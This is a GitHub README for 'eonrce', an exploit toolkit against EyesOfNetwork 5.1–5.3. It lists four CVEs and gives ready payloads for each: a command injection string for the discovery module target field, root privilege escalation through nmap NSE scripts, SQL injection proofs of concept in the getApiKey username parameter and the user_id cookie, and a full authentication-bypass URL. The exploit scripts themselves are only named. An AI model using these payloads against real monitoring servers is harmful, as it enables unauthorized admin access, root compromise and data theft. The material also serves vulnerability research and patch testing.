Skip to content

Latest commit

 

History

History
19 lines (13 loc) · 1.05 KB

README.md

File metadata and controls

19 lines (13 loc) · 1.05 KB

eonrce

EyesOfNetwork 5.1 to 5.3 exploits

Theses two exploit files uses the following CVE's:

CVE_number__ Description
CVE-2020-8654 Discovery module to allows to run arbitrary OS commands
We were able to run the id command with the following payload in the target field : ;id #.
CVE-2020-8655 LPE via nmap NSE script
As the apache user is allowed to run nmap as root, we were able to execute arbitrary commands by providing a specially crafted NSE script.
nmap version 6.40 is used and doesn't have the -c and -e options.
CVE-2020-8656 SQLi in API in getApiKey function on 'username' field
PoC: /eonapi/getApiKey?username=' union select sleep(3),0,0,0,0,0,0,0 or '
Auth bypass: /eonapi/getApiKey?&username=' union select 1,'admin','1c85d47ff80b5ff2a4dd577e8e5f8e9d',0,0,1,1,8 or '&password=h4knet#
CVE-2020-9465 SQLi in API in Cookies user_id field
PoC: Cookie: user_id=1' union select sleep(3) -- ;

eonrce.py

screenshot

eonrce2.py

screenshot